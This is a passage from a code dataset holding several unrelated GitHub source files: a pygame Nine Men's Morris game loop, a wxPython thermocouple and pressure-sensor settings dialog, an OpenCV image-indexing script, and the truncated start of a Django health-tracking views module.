the board: {e}\")\n\ndef draw_game_info(screen, game_functions, gameover):\n # Display the variables from the Board class\n if gameover == True:\n texts = [\n f\"Game Over! Player {2 if game_functions.get_player_turn() == 1 else 1} wins!\"\n ]\n if gameover == False: \n texts = [\n f\"Positions: {game_functions.get_positions()}\",\n f\"Player Turn: {game_functions.get_player_turn()}\",\n f\"Active Mills: {game_functions.get_active_mills()}\",\n f\"Remaining Turns: {game_functions.get_remaining_turns()}\",\n ]\n\n for i, text in enumerate(texts):\n textsurface = myfont.render(text, False, (0, 0, 0))\n screen.blit(textsurface, (10, 600 + i*30))\n\ndef game_loop():\n\n print(\"Initializing game window...\")\n screen.fill(WHITE)\n clock = pygame.time.Clock()\n\n print(\"Entering main game loop...\")\n running = True\n startpos = None\n endpos = None\n removepos = False\n gameover = False\n while running:\n try:\n # Event handling\n \n for event in pygame.event.get():\n print(\" The board positions(A): \", board.get_positions())\n board_positions_now = board.get_positions()\n print(\" The board positions(B): \", board_positions_now)\n\n print(f\"Event: {event}\") # This will print out each event captured\n if event.type == pygame.QUIT:\n print(\"Quit event detected. Closing game window...\")\n board.cleanup()\n running = False\n break\n \n print(\"event.type: \", event.type)\n print(\"pygame.MOUSEBUTTONUP: \", pygame.MOUSEBUTTONUP)\n if event.type == pygame.MOUSEBUTTONUP:\n # Check if a clickable area was clicked\n print(\"here\")\n for idx, rect in enumerate(clickables):\n print(\"the clickables are: \", enumerate(clickables))\n print(\"The idx is: \", idx)\n print(\"The rect is: \", rect)\n print(\"here1\")\n print(\"event.pos: \", event.pos)\n if rect.collidepoint(event.pos):\n print(\"here1.5\")\n if removepos == True:\n board_positions_now = board.get_positions()\n if board.form_mill(idx):\n board.check_remove_active_mill()\n removepos = False\n board.save_current_state_to_log()\n break\n break\n if board.get_remaining_turns() != 0:\n print(\"here2\")\n print(f\"Clicked on position: {idx}\")\n if board.place_piece(idx): \n board.check_remove_active_mill()\n if board.form_mill_GUI():\n removepos = True\n break\n board.save_current_state_to_log()\n break\n if board.get_remaining_turns() == 0:\n if board.is_game_over():\n print(\"Game over!\")\n print(f\"Player {2 if board.get_player_turn() == 1 else 1} wins!\") \n gameover = True \n break\n if startpos == None: \n startpos = idx \n print(\"startpos: \", startpos)\n break\n else:\n if startpos == idx:\n break\n endpos = idx\n print(\"endpos: \", endpos)\n if board.player_piece_count() == 3:\n if board.fly_piece(startpos, endpos):\n board.check_remove_active_mill()\n if board.form_mill_GUI():\n removepos = True\n startpos = None\n endpos = None\n break\n board.save_current_state_to_log()\n startpos = None\n endpos = None\n break\n else:\n startpos = None\n endpos = None\n else:\n if board.move_piece(startpos, endpos):\n board.check_remove_active_mill()\n if board.form_mill_GUI():\n removepos = True\n startpos = None\n endpos = None\n break\n board.save_current_state_to_log()\n startpos = None\n endpos = None\n break \n else:\n startpos = None\n endpos = None\n\n #print(\"startpos: \", startpos)\n #print(\"endpos: \", endpos)\n print(\"removepos: \", removepos)\n print(\"board positions: \", board.get_positions())\n print(\"board player turn: \", board.get_player_turn())\n # Add more event handling logic here for other phases\n print(\"remaining turns: \", board.get_remaining_turns())\n # Drawing the game state\n #print(\"Calling draw_board()...\")\n screen.fill(WHITE)\n draw_board(screen, boardImg, board.get_positions(), coords)\n \n #print(\"Calling draw_game_info()...\")\n draw_game_info(screen, board, gameover)\n\n # Updating the display\n #print(\"Updating display...\")\n pygame.display.flip()\n\n # Frame rate\n clock.tick(60)\n except Exception as e:\n print(f\"Error in game loop: {e}\")\n running = False\n\n print(\"Exiting game...\")\n # remove temp file\n board.cleanup()\n\n pygame.quit()\n sys.exit()\n\n# #set positions in board to 1 or 2\n# board.set_positions([1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2,\n# 2, 2, 2, 2, 2, 2, 0, 0, 0, 0, 0, 0])\n# # Call the main game loop\n#game_functions.new_restart_game()\ngame_loop()","repo_name":"veryberry13/Nine-Men-s-Morris-Group-Project","sub_path":"NineMensMorris_front_end.py","file_name":"NineMensMorris_front_end.py","file_ext":"py","file_size_in_byte":10681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29093946489","text":"import wx\nfrom pubsub import pub\nfrom Enumerations import *\nfrom Dialogs.DialogCalibrate import CalibrateDialog\nfrom Dialogs.DialogProfileManager import NamingDialog\nfrom HelperFunctions import infoDialog\nfrom HelperFunctions import changeComboboxBgColour, changeComboboxFgColour\n\n\nclass ViewSensorsDialog(wx.Dialog):\n\n def __init__(self, parent):\n wx.Dialog.__init__(self, parent, wx.ID_ANY, \"Sensor Settings\")\n \n self.nb = wx.Notebook(self)\n self.parent = parent\n app = wx.GetApp()\n assert app is not None, \"In ViewSensorsDialog.__init__. wx.App not created yet\"\n self.machineSettings = app.machineSettings\n\n self.resultThermocoupleMap = [] # The list to hold the selected results to pass back to the main UI\n self.resultPressureMap = [] # The list to hold the selected results to pass back to the main UI\n\n # Arrays to hold the channel widgets\n self.txtThermocoupleStatuses = []\n self.txtThermocoupleValues = []\n self.btnThermocoupleCalibrate = []\n self.cmbThermocoupleChannels = [] # Dropdown list of placements to choose from\n self.txtThermocoupleLabels = []\n self.txtPressureStatuses = []\n self.txtPressureValues = []\n self.cmbPressureChannels = []\n self.btnPressureCalibrate = []\n self.btnPressureAdd = []\n self.btnPressureRemove = []\n\n\n # Create the tab panels to add to the notebook\n #======================================================================\n self.tabPanels = []\n\n # Make the sizers\n #======================================================================\n thermocoupleGroup = wx.StaticBox(self, wx.ID_ANY, \"Thermocouples (deg. C)\")\n thermocoupleSizer = wx.StaticBoxSizer(thermocoupleGroup, wx.VERTICAL) # wx.HORIZONTAL)\n pressureGroup = wx.StaticBox(self, wx.ID_ANY, \"Pressure Sensors (in H2O)\")\n pressureSizer = wx.StaticBoxSizer(pressureGroup, wx.HORIZONTAL)\n\n instructionsSizer = wx.BoxSizer(wx.HORIZONTAL)\n thermocoupleColumnSizers = []\n pressureGridSizer = wx.FlexGridSizer(3, 6, 5, 5)\n btnSizer = wx.BoxSizer(wx.HORIZONTAL)\n channelsSizer = wx.BoxSizer(wx.VERTICAL)\n topSizer = wx.BoxSizer(wx.VERTICAL)\n\n instructionsString = \"Check the status of all the sensor channels.\\nCalibrations and TC role set here will be saved in the currently selected profile.\\nYou may also give the channels a unique label by entering it in the box on the right.\\nDisabled thermocouples will not have their data recorded.\"\n self.lblInstructions = wx.StaticText(self, wx.ID_ANY, instructionsString)\n instructionsSizer.Add(self.lblInstructions, 0, wx.ALL, 5)\n\n # Make the thermocouple lists\n #======================================================================\n numTCRows = 10\n #colIdx = -1\n tabIdx = -1\n\n for index in range(self.machineSettings.numTC):\n\n if index % numTCRows == 0:\n tabIdx += 1 # Start adding to the next tab\n self.tabPanels.append(wx.Panel(self.nb)) # Create another tab panel\n thermocoupleColumnSizers.append(wx.FlexGridSizer(numTCRows, 5, 5, 5))\n thermocoupleColumnSizers[tabIdx].AddGrowableCol(4, 1) # Stretch out the last col\n self.tabPanels[tabIdx].SetSizer(thermocoupleColumnSizers[tabIdx])\n\n # Make the controls\n #------------------------------------------------------------------\n # The real time value from the sensor\n self.txtThermocoupleValues.append(wx.TextCtrl(self.tabPanels[tabIdx],\n wx.ID_ANY,\n \"------\",\n style=wx.TE_READONLY|wx.TE_CENTER))\n # The channel number and status indicator\n self.txtThermocoupleStatuses.append(wx.TextCtrl(self.tabPanels[tabIdx],\n wx.ID_ANY,\n \"CH. \" + str(index+1) + \" CLOSED\",\n style=wx.TE_READONLY|wx.TE_CENTER,\n size=(140, -1)))\n self.txtThermocoupleStatuses[index].SetForegroundColour(UIcolours.CTRL_ERROR_FG)\n self.txtThermocoupleStatuses[index].SetBackgroundColour(UIcolours.CTRL_ERROR_BG)\n\n # The calibration button\n self.btnThermocoupleCalibrate.append(wx.Button(self.tabPanels[tabIdx], wx.ID_ANY, \"Calibrate\"))\n self.btnThermocoupleCalibrate[index].Bind(wx.EVT_BUTTON, self.onCalibrate)\n self.btnThermocoupleCalibrate[index].channel = index\n self.btnThermocoupleCalibrate[index].sensorType = \"TC\"\n\n # The channel role mapping combobox\n self.cmbThermocoupleChannels.append(wx.ComboBox(self.tabPanels[tabIdx],\n id=wx.ID_ANY,\n choices=thermocouplePlacementLabels,\n value=thermocouplePlacementLabels[0],\n style=wx.CB_READONLY))\n\n changeComboboxBgColour(self.cmbThermocoupleChannels[index], UIcolours.CTRL_DISABLED_BG)\n changeComboboxFgColour(self.cmbThermocoupleChannels[index], UIcolours.CTRL_DISABLED_FG)\n self.cmbThermocoupleChannels[index].Bind(wx.EVT_COMBOBOX, self.onThermocoupleSelect)\n # Size the combobox to be just right\n height = self.cmbThermocoupleChannels[index].Size[1]\n width, h = self.cmbThermocoupleChannels[index].GetTextExtent(\"AFTERBURNER\")\n self.cmbThermocoupleChannels[index].SetMinSize((width+height+30, height))\n\n self.txtThermocoupleLabels.append(wx.TextCtrl(self.tabPanels[tabIdx],\n wx.ID_ANY,\n \"-------------------------\",\n style=wx.TE_LEFT))\n\n self.txtThermocoupleLabels[index].Bind(wx.EVT_KILL_FOCUS, self.onLabelChange)\n\n # Associate this row with the actual channel for this sensor\n # That way when attached and valuechange events come in\n # we can update the correct row.\n self.txtThermocoupleStatuses[index].channel = index\n self.txtThermocoupleValues[index].channel = index\n self.txtThermocoupleLabels[index].channel = index\n\n # Add them to the sizer.\n #if index % numTCRows == 0:\n # colIdx += 1 # Increment to column index\n # thermocoupleColumnSizers.append(wx.FlexGridSizer(numTCRows, 3, 5, 5))\n\n\n thermocoupleColumnSizers[tabIdx].Add(self.txtThermocoupleStatuses[index], 1, wx.TOP|wx.LEFT|wx.RIGHT|wx.EXPAND, 2)\n thermocoupleColumnSizers[tabIdx].Add(self.txtThermocoupleValues[index], 1, wx.TOP|wx.LEFT|wx.RIGHT|wx.EXPAND, 2)\n thermocoupleColumnSizers[tabIdx].Add(self.btnThermocoupleCalibrate[index], 1, wx.TOP|wx.LEFT|wx.RIGHT|wx.EXPAND, 2)\n thermocoupleColumnSizers[tabIdx].Add(self.cmbThermocoupleChannels[index], 1, wx.TOP|wx.LEFT|wx.RIGHT|wx.EXPAND, 2)\n thermocoupleColumnSizers[tabIdx].Add(self.txtThermocoupleLabels[index], 1, wx.TOP|wx.LEFT|wx.RIGHT|wx.EXPAND, 2)\n #thermocoupleColumnSizers[tabIdx].Layout()\n\n #for sizer in thermocoupleColumnSizers:\n # thermocoupleSizer.Add(sizer, 1, wx.ALL|wx.EXPAND,15)\n\n # Add all the tab panels to the notebook as tabs\n idx = 1\n for tabPanel in self.tabPanels:\n self.nb.AddPage(tabPanel, \"CH. \" + str((numTCRows*(idx-1))+1) + \" - \" + str(numTCRows*idx))\n idx += 1\n\n thermocoupleSizer.Add(self.nb, 1, wx.ALL|wx.EXPAND,15)\n\n\n # Make the pressure sensor lists\n #======================================================================\n for index in range(self.machineSettings.numPres):\n # Make the controls\n\n # Make the dropdown list of serials for this channel\n # Get the list of serial numbers associated with this channel\n self.cmbPressureChannels.append(wx.ComboBox(self,\n id=wx.ID_ANY,\n choices=self.machineSettings.getPressureChannelSerials(index),\n value=self.machineSettings.pressurePlacementLabels[0], # Default to DISABLED\n style=wx.CB_READONLY))\n\n #self.cmbPressureChannels[index].Bind(wx.EVT_COMBOBOX, self.onPressureSelect)\n height = self.cmbPressureChannels[index].Size[1]\n width, h = self.cmbPressureChannels[index].GetTextExtent(\"XXXXXXXX\") # TODO This should be as long as the serial numbers\n self.cmbPressureChannels[index].SetMinSize((width+height+30, height)) # Size the combobox to be just right\n self.cmbPressureChannels[index].SetStringSelection(self.machineSettings.getCurrentPressureChannelSerial(index))\n self.cmbPressureChannels[index].Bind(wx.EVT_COMBOBOX, self.onSerialSelect)\n self.cmbPressureChannels[index].channel = index\n\n self.txtPressureValues.append(wx.TextCtrl(self,\n wx.ID_ANY,\n \"------\",\n style=wx.TE_READONLY|wx.TE_CENTER))\n\n # The label string and connection status\n labelString = \"CH. \" + str(index+1) + \" (\" + self.machineSettings.pressurePlacementLabels[index+1] + \") CLOSED\"\n self.txtPressureStatuses.append(wx.TextCtrl(self,\n wx.ID_ANY,\n labelString,\n style=wx.TE_READONLY|wx.TE_CENTER,\n size=(220, -1)))\n self.txtPressureStatuses[index].SetForegroundColour(UIcolours.CTRL_ERROR_FG)\n self.txtPressureStatuses[index].SetBackgroundColour(UIcolours.CTRL_ERROR_BG)\n\n self.btnPressureCalibrate.append(wx.Button(self, wx.ID_ANY, \"Calibrate\"))\n self.btnPressureCalibrate[index].Bind(wx.EVT_BUTTON, self.onCalibrate)\n self.btnPressureCalibrate[index].channel = index\n self.btnPressureCalibrate[index].sensorType = \"PRESS\"\n\n self.btnPressureAdd.append(wx.Button(self, wx.ID_ANY, \"Add Sensor\"))\n self.btnPressureAdd[index].Bind(wx.EVT_BUTTON, self.onAdd)\n self.btnPressureAdd[index].channel = index\n\n self.btnPressureRemove.append(wx.Button(self, wx.ID_ANY, \"Remove Sensor\"))\n self.btnPressureRemove[index].Bind(wx.EVT_BUTTON, self.onRemove)\n self.btnPressureRemove[index].channel = index\n self.btnPressureRemove[index].Disable()\n\n # Add them to the sizer.\n pressureGridSizer.Add(self.txtPressureStatuses[index], 1, wx.EXPAND, 5)\n pressureGridSizer.Add(self.txtPressureValues[index], 1, wx.EXPAND, 5)\n pressureGridSizer.Add(self.btnPressureCalibrate[index], 1, wx.EXPAND, 5)\n pressureGridSizer.Add(self.cmbPressureChannels[index], 1, wx.EXPAND, 5)\n pressureGridSizer.Add(self.btnPressureAdd[index], 1, wx.EXPAND, 5)\n pressureGridSizer.Add(self.btnPressureRemove[index], 1, wx.EXPAND, 5)\n\n pressureSizer.Add(pressureGridSizer, 1, wx.ALL|wx.EXPAND,15)\n\n # The buttons\n #======================================================================\n self.btnOK = wx.Button(self, wx.ID_OK, \"OK\")\n self.btnOK.Bind(wx.EVT_BUTTON, self.onOK)\n self.Bind(wx.EVT_CLOSE, self.onQuit)\n btnSizer.Add(self.btnOK, 0, wx.ALL, 5)\n\n # Add all the sizers to the top level\n #======================================================================\n channelsSizer.Add(thermocoupleSizer, 0, wx.ALL|wx.EXPAND, 5)\n channelsSizer.Add(pressureSizer, 0, wx.ALL|wx.EXPAND, 5)\n topSizer.Add(instructionsSizer, 0, wx.ALL|wx.RIGHT, 5)\n topSizer.Add(channelsSizer, 0, wx.ALL|wx.EXPAND, 5)\n topSizer.Add(btnSizer, 0, wx.ALL|wx.ALIGN_RIGHT, 5)\n \n self.SetSizer(topSizer)\n topSizer.Fit(self)\n topSizer.SetSizeHints(self)\n self.Layout()\n self.Centre()\n \n\n\n # Subscribe to message sent out by the attach handlers\n pub.subscribe(self.onAttach, \"channel.attached\")\n pub.subscribe(self.onValueChange, \"channel.valueChange\")\n # Change the units to C and inH2O because that is what the automatic calibration is based on.\n self.parent.controller.setTemperatureUnits(\"C\")\n self.parent.controller.setPressureUnits(\"inH2O\")\n self.parent.controller.areAllAttached() # Give the user a message you are waiting for the connection\n\n # We then need to process it to make up our list of selected sensors.\n self.loadSavedSelections()\n\n\n def loadSavedSelections(self):\n # Get the saved selection map from the controller and load it here\n # Load the thermocouple channels\n for index, cmb in enumerate(self.cmbThermocoupleChannels):\n placement = int(self.machineSettings.getThermocouplePlacement(index)) # Get the int value of the enum to use as an index\n cmb.SetSelection(placement) #using the enumeration in the map to load the proper selection in the dropbox\n changeComboboxBgColour(cmb, thermocoupleSelectionClrs[placement])\n if placement > 0: # we are not disabled\n changeComboboxFgColour(cmb, UIcolours.CTRL_NORMAL_FG)\n\n # Load up the labels as well.\n for index, txt in enumerate(self.txtThermocoupleLabels):\n label = self.parent.controller.getThermocoupleLabel(index)\n txt.SetValue(label)\n\n # Load the pressure channel serials that were saved for each of the channels\n for index, cmb in enumerate(self.cmbPressureChannels):\n serialNumber = self.machineSettings.getCurrentPressureChannelSerial(index)\n cmb.SetValue(serialNumber)\n cmb.SetSelection(self.machineSettings.getPressureChannelSerials(index).index(serialNumber))\n changeComboboxBgColour(cmb, UIcolours.CTRL_DISABLED_BG if cmb.GetSelection() == 0 else UIcolours.CTRL_NORMAL_BG)\n changeComboboxFgColour(cmb, UIcolours.CTRL_DISABLED_FG if cmb.GetSelection() == 0 else UIcolours.CTRL_NORMAL_FG)\n\n if cmb.GetSelection() == 0:\n self.btnPressureRemove[index].Disable()\n else:\n self.btnPressureRemove[index].Enable()\n \n\n def onOK(self, event):\n # Stop listening for these values.\n pub.unsubscribe(self.onValueChange, \"channel.valueChange\")\n\n # Pull all the info for the selection into the map\n # TODO Might want to check if all the roles have been assigned and if not check with the user if they want to continue.\n for cmb in self.cmbThermocoupleChannels:\n self.resultThermocoupleMap.append(thermocouplePlacements(cmb.GetSelection())) # This should match up with the enumeration\n\n for cmb in self.cmbPressureChannels:\n self.resultPressureMap.append(cmb.GetStringSelection())\n\n #self.EndModal(wx.ID_OK)\n self.Destroy()\n\n def onQuit(self, event):\n self.resultThermocoupleMap = None\n self.resultPressureMap = None\n pub.unsubscribe(self.onValueChange, \"channel.valueChange\")\n self.Destroy()\n\n\n # def tryToConnect(self):# Remember the furnace enums start at 2\n # # Try to open the selected channels on the DAQ\n # #pub.sendMessage(\"status.update\", msg=\"Opening sensor channels.\")\n # #self.parent.controller.openAllChannels()\n # # Give the user a message you are waiting for the connection\n # self.parent.controller.areAllAttached()\n\n\n def onValueChange(self, sensorType, channel, valueRaw, valueNumeric, valueFormatted):\n #TODO should we flag bad values with a red background?\n if sensorType == \"TC\":\n if channel >= self.machineSettings.numTC:\n return\n wx.CallAfter(self.txtThermocoupleValues[channel].SetValue, valueFormatted)\n elif sensorType == \"PRESS\":\n if channel >= self.machineSettings.numPres:\n return\n wx.CallAfter(self.txtPressureValues[channel].SetValue, valueFormatted)\n else:\n # Do nothin\n return\n\n def onAttach(self, sensorType, channel):\n if sensorType == \"TC\":\n if channel >= self.machineSettings.numTC:\n return\n # Ok change the connection status for this channel\n wx.CallAfter(self.txtThermocoupleStatuses[channel].SetValue, \"CH. \" + str(channel+1) + \" OPENED\")\n self.txtThermocoupleStatuses[channel].SetForegroundColour(UIcolours.CTRL_OK_FG)\n self.txtThermocoupleStatuses[channel].SetBackgroundColour(UIcolours.CTRL_OK_BG)\n elif sensorType == \"PRESS\":\n if channel >= self.machineSettings.numPres:\n return\n labelString = \"CH. \" + str(channel+1) + \" (\" + self.machineSettings.pressurePlacementLabels[channel+1] + \") OPENED\"\n wx.CallAfter(self.txtPressureStatuses[channel].SetValue, labelString)\n self.txtPressureStatuses[channel].SetForegroundColour(UIcolours.CTRL_OK_FG)\n self.txtPressureStatuses[channel].SetBackgroundColour(UIcolours.CTRL_OK_BG)\n else:\n # Do nothing.\n return\n\n\n def onCalibrate(self, event):\n button = event.GetEventObject()\n if button.sensorType == \"PRESS\":\n serialNumber = self.cmbPressureChannels[button.channel].GetStringSelection() # Grab the loaded serialNumber\n if (serialNumber and serialNumber.strip()):\n dlg = CalibrateDialog(self, button.sensorType, button.channel, serialNumber)\n else:\n return # Nope out of here.\n else:\n dlg = CalibrateDialog(self, button.sensorType, button.channel)\n dlg.ShowModal()\n dlg.Destroy()\n\n\n def onSerialSelect(self, event):\n # Adjust the current open channel's calibration for the user to see\n cmb = event.GetEventObject()\n channelIndex = cmb.channel\n serialNumber = cmb.GetStringSelection()\n gain, offset = self.parent.controller.getPressureCalibration(channelIndex, serialNumber)\n self.parent.controller.setPressureCurrentCalibration(gain, offset, channelIndex)\n\n changeComboboxBgColour(cmb, UIcolours.CTRL_DISABLED_BG if cmb.GetSelection() == 0 else UIcolours.CTRL_NORMAL_BG)\n changeComboboxFgColour(cmb, UIcolours.CTRL_DISABLED_FG if cmb.GetSelection() == 0 else UIcolours.CTRL_NORMAL_FG)\n\n if cmb.GetSelection() == 0:\n self.btnPressureRemove[channelIndex].Disable()\n else:\n self.btnPressureRemove[channelIndex].Enable()\n\n\n def onThermocoupleSelect(self, event):\n cmb = event.GetEventObject()\n index = cmb.GetSelection()\n # Change the colour\n changeComboboxBgColour(cmb, thermocoupleSelectionClrs[index])\n changeComboboxFgColour(cmb, UIcolours.CTRL_DISABLED_FG if index == 0 else UIcolours.CTRL_NORMAL_FG)\n\n # TODO Modify this to check that there are not more than 2 AFTERBURNER roles selected\n # Check that the value doesn't exist in the other boxes.\n # If it does then flip them to disabled.\n\n # We have no number limits on placements that are not afterburner. You can leave now.\n if index != int(thermocouplePlacements.AFTERBURNER):\n return\n\n # Otherwise, make sure that the afterburner limit is respected.\n numOfAllowedAfterburners = 2\n numFoundAfterburners = 0\n\n for cmbBox in self.cmbThermocoupleChannels:\n if cmbBox is cmb: # Don't try to change yourself.\n continue\n\n # Count up the number of afterburner channels.\n # if >= 2 then disable the later found ones\n if cmbBox.GetSelection() == int(thermocouplePlacements.AFTERBURNER):\n numFoundAfterburners += 1\n if numFoundAfterburners >= numOfAllowedAfterburners:\n cmbBox.SetSelection(int(thermocouplePlacements.DISABLED)) # Set to DISABLED\n changeComboboxBgColour(cmbBox, thermocoupleSelectionClrs[0])\n changeComboboxFgColour(cmbBox, UIcolours.CTRL_DISABLED_FG)\n\n\n def onAdd(self, event):\n btn = event.GetEventObject()\n channelIndex = btn.channel\n # Get the serial number to add.\n dlg = NamingDialog(parent=self, title=\"Enter serial number of pressure sensor\")\n dlg.ShowModal()\n\n # Check and collect the results\n if dlg.resultName is None:\n dlg.Destroy()\n return\n\n # TODO should check if the serial number already exists in the list.\n if dlg.resultName in self.cmbPressureChannels[channelIndex].GetItems():\n infoDialog(self, \"This serial number already exists in the list.\")\n return\n # Add it to the machine settings\n # Append it to the dropdown list.\n self.parent.controller.addPressureSensorToChannel(channelIndex, dlg.resultName)\n self.cmbPressureChannels[channelIndex].Append(dlg.resultName)\n dlg.Destroy()\n\n\n def onRemove(self, event):\n btn = event.GetEventObject()\n channelIndex = btn.channel\n serialNumber = self.cmbPressureChannels[channelIndex].GetStringSelection()\n selectedIndex = self.cmbPressureChannels[channelIndex].GetSelection()\n\n if not(serialNumber and serialNumber.strip()):\n return\n # Ask if they are sure they want to remove the serial from the channel\n dlg = wx.MessageDialog(self, \"Are you sure you want to remove this serial number?\\nThe calibration data for this channel/sensor combination will be lost.\", \"Confirm Removal\", wx.OK|wx.CANCEL|wx.ICON_QUESTION)\n result = dlg.ShowModal()\n dlg.Destroy()\n if result == wx.ID_CANCEL:\n return\n\n # Nope, they really want to remove it.\n # Remove it from the machine settings\n # if selectedIndex == 0: # Not the DISABLED entry though\n # event.Skip()\n\n self.parent.controller.removePressureSensorFromChannel(channelIndex, serialNumber) # Adding the one because we stripped off the 0th index in the init\n self.cmbPressureChannels[channelIndex].Delete(selectedIndex) # Take it out of the combobox\n # TODO BUG need to set this to nothing when all the sensors are removed.\n self.cmbPressureChannels[channelIndex].SetSelection(0) # Change the selection\n if self.cmbPressureChannels[channelIndex].IsListEmpty():\n self.cmbPressureChannels[channelIndex].Clear() # If list is empty erase the text TODO Check if this works on a windows machine.\n\n\n def onLabelChange(self, event):\n \"\"\"\n Clean the entry and save the new label.\n \"\"\"\n txt = event.GetEventObject()\n channelIndex = txt.channel\n label = txt.GetValue()\n\n self.parent.controller.setThermocoupleLabel(label, channelIndex)\n\n event.Skip()\n","repo_name":"sperraton/firetestprogram","sub_path":"Dialogs/DialogViewSensors.py","file_name":"DialogViewSensors.py","file_ext":"py","file_size_in_byte":23860,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"747805248","text":"import color_descriptor\nimport structure_descriptor\nimport glob\nimport argparse\nimport cv2\n\nidealBins = (8, 12, 3)\ncolorDesriptor = color_descriptor.ColorDescriptor(idealBins)\n\noutput = open(\"colorindex.csv\",\"w\")#arguments[\"colorindex\"], \"w\")\n\nfor imagePath in glob.glob(\"D:/Photos/airplanes_side\"+ \"/*.jpg\"): #arguments[\"dataset\"] + \"/*.jpg\"):\n imageName = imagePath[imagePath.rfind(\"/\") + 1 : ]\n image = cv2.imread(imagePath)\n features = colorDesriptor.describe(image)\n # write features to file\n features = [str(feature).replace(\"\\n\", \"\") for feature in features]\n output.write(\"%s,%s\\n\" % (imageName, \",\".join(features)))\n# close index file\noutput.close()\n\nkps = 100\nstructureDescriptor = structure_descriptor.StructureDescriptor(kps)\n\noutput = open(\"structureindex.csv\", \"w\")#arguments[\"structureindex\"], \"w\")\n\nfor imagePath in glob.glob(\"D:/Photos/airplanes_side\" + \"/*.jpg\"):\n imageName = imagePath[imagePath.rfind(\"/\") + 1 : ]\n image = cv2.imread(imagePath)\n structures = structureDescriptor.describe(image)\n # write structures to file\n structures = [str(structure).replace(\"\\n\", \"\") for structure in structures]\n output.write(\"%s,%s\\n\" % (imageName, \",\".join(structures)))\n# close index file\noutput.close()\n","repo_name":"currybur/EE208-Search-Engine","sub_path":"image_search_engine/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1251,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"41889399552","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.template import RequestContext, loader\nfrom data.models import Day, Sleep, HappyLog, UnhappyLog, Exercise, FoodScore, HappyScore, TestModel\nfrom data.forms import DayForm, SleepForm, TestForm, FoodForm, ExerciseForm, HSForm, HappyForm, UnhappyForm\nfrom django.forms.models import modelformset_factory\nimport datetime\nfrom random import randint\nimport calendar\nfrom django.contrib.auth.decorators import login_required\n# Create your views here.\n\n#CSS\nGOOD = 'good_text'\nOK = 'ok_text'\nBAD = 'bad_text'\n\ndef get_day_list():\n\tday_list = Day.objects.order_by('-date')\n\thappy_list = HappyLog.objects.all()\n\tsad_list = UnhappyLog.objects.all()\n\tfood_score = FoodScore.objects.all()\n\thappy_score = HappyScore.objects.all()\n\texercise = Exercise.objects.all()\n\tsleep = Sleep.objects.all()\n\t\n\tday_log = []\n\tday_list = day_list[get_index_of_today():]\n\tfor d in day_list:\n\t\tda = d.date\n\t\thappy_items = happy_list.filter(date=da)\n\t\tsad_items = sad_list.filter(date=da)\n\t\ttry:\n\t\t\tp_score = food_score.get(date=da).p_score\n\t\t\tg_score = food_score.get(date=da).g_score\n\t\texcept FoodScore.DoesNotExist:\n\t\t\tp_score = None\n\t\t\tg_score = None\n\t\ttry:\n\t\t\th_score = happy_score.get(date=da)\n\t\texcept HappyScore.DoesNotExist:\n\t\t\th_score = None\n\t\texercise_items = exercise.filter(date=da)\n\t\ttry:\n\t\t\tsleep_str = sleep.get(date=da).sleep_str()\n\t\texcept Sleep.DoesNotExist:\n\t\t\tsleep_str = 'n/a'\n\t\tday_log.append({'day':d.date_str, \n\t\t\t\t\t\t'happy_list':[str(h) for h in happy_items], \n\t\t\t\t\t\t'sad_list':[str(s) for s in sad_items],\n\t\t\t\t\t\t'exercise_list':[str(e) for e in exercise_items] if exercise_items else '-',\n\t\t\t\t\t\t'p_score': p_score if p_score is not None else '-',\n\t\t\t\t\t\t'g_score': g_score if g_score is not None else '-',\n\t\t\t\t\t\t'h_score': h_score,\n\t\t\t\t\t\t'sleep': sleep_str\n\t\t\t\t\t\t\t\t\t\t})\n\t\t# day_log.append([str(d),str(happy_items)])\n\t\t\n\treturn day_log\n\n# returns a tuple of (avg hours slept, time in bed)\ndef get_sleep_summary():\n\tlast_week = [d.date for d in last_n_days(7)]\n\tsleep_objects = Sleep.objects.all().filter(date__in=last_week)\n\thours_slept = avg_hours_slept(sleep_objects)\n\ttime_in_bed = avg_time_in_bed(sleep_objects)\n\tif hours_slept >= 7:\n\t\tcss_hours = GOOD\n\telif hours_slept >= 6:\n\t\tcss_hours = OK\n\telse:\n\t\tcss_hours = BAD\n\t\t\n\tif time_in_bed < datetime.time(1,0):\n\t css_time = GOOD\n\telif time_in_bed < datetime.time(2,0):\n\t css_time = OK\n\telif time_in_bed >= datetime.time(2,0) and time_in_bed < datetime.time(12,0):\n\t css_time = BAD\n\telse:\n\t css_time = GOOD\n\t\n\treturn {'avg_hours_slept': hours_slept,\n\t\t\t'avg_time_in_bed': time_in_bed, \n\t\t\t'css_hours' : css_hours,\n\t\t\t'css_time' : css_time\n\t\t\t}\n\ndef get_food_summary():\n\tlast_week = [d.date for d in last_n_days(7)]\n\tfood_objects = FoodScore.objects.all().filter(date__in=last_week)\n\tp_sum = sum([f.p_score for f in food_objects])\n\tg_sum = sum([f.g_score for f in food_objects])\n\tp_percent = str(100-round(float(p_sum) / 21,2)*100)\n\tg_percent = str(100-round(float(g_sum) / 21,2)*100)\n\tif p_percent >= 50:\n\t\tp_grade = GOOD\n\telif p_percent >= 30:\n\t\tp_grade = OK\n\telse:\n\t\tp_grade = BAD\n\t\n\tif g_percent >= 80:\n\t\tg_grade = GOOD\n\telif g_percent >= 50:\n\t\tg_grade = OK\n\telse:\n\t\tg_grade = BAD\n\t\n\treturn {'p_percent': p_percent+\"%\",\n\t\t\t'p_grade': p_grade,\n\t\t\t'g_percent': g_percent+\"%\",\n\t\t\t'g_grade': g_grade}\n\t\t\t\ndef get_exercise_summary():\n\tlast_week = [d.date for d in last_n_days(7)]\n\texercise_objects = Exercise.objects.all().filter(date__in=last_week)\n\tdays = percent_days_exercised(exercise_objects,last_week)\n\ttypes = types_exercised(exercise_objects)\n\tif days >= 6:\n\t\tday_grade = GOOD\n\telif days >= 4:\n\t\tday_grade = OK\n\telse:\n\t\tday_grade = BAD\n\treturn {'days': days,\n\t\t\t'types': types,\n\t\t\t'day_grade': day_grade }\n\t\t\t\ndef get_happiness_summary():\n\tlast_week = [d.date for d in last_n_days(7)]\n\thappy_objects = HappyLog.objects.all().filter(date__in=last_week)\n\ths_objects = 